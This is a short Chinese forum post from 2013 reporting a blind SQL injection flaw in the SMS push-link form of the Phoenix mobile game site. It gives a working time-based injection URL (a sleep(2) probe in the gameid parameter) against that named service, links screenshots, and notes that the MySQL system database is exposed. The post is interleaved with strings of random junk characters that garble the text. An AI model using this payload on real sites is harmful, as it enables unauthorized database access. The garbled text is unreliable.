简要描述:+ m) |5 \+ F' {# f( g% A
凤凰手机游戏网,在填写手机号码发送push连接的地方存在sql盲注漏洞。 V; ^0 G' e; ]7 g, y8 G/ q$ C
* U( N" B9 Q) `
详细说明:& B, @$ ^6 \. e4 \) ^/ _- G
存在SQL盲注url:1 x+ S( ]! `; f6 o
fenghuang/game/game_send_sms.jsp?gameid=130221346000%27%20and%20sleep%282%29%3d%27&mo=13 f E, ^7 }! Q6 k4 Q
http://www.myhack58.com/Article/UploadPic/2013-4/2013411254849748.png( U) Q5 g; g4 J- k r
http://www.myhack58.com/Article/UploadPic/2013-4/20134112545369314.png
0 R. s7 F7 w/ x5 {, chttp://www.myhack58.com/Article/UploadPic/2013-4/20134112565766695.jpg$ M8 _+ ~: R+ x8 w* e9 {; u
$ N8 K& T0 R+ u5 e能看到mysql系统数据库,看来user权限应该很高的。。 | 
发表于 2013-4-4 17:34:29
收藏
支持
反对